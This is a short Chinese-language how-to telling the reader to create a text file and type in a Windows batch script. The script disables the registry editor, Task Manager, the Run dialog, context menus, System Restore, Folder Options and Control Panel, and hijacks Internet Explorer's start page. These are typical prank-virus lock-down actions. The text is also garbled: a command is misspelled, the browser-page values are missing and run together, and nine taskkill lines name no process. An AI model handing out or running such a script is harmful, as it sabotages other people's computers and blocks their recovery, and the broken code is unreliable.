1.首先一个【新建文本文档】
2.打开,输入以下内容:
@echo off
EG ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000001 /f
REG ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f
reg add
hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v
restrictrun /t reg_dword /d 00000001 /f
reg add
hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v
notraycontextmenu /t reg_dword /d 00000001 /f
reg add
hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v noviewcontextmenu /t reg_dword /d 00000001 /f
reg add
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /V DisableSR /t reg_dword /d 00000001 /f
REG ADD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoFolderOptions /t REG_dword /d 00000001 /f
reg add
hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nocontrolpanel /t reg_dword /d 00000001 /f
reg add
"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d taskkill /f /im
taskkill /f /im
taskkill /f /im
taskkill /f /im
taskkill /f /im
taskkill /f /im
taskkill /f /im
taskkill /f /im
taskkill /f /im

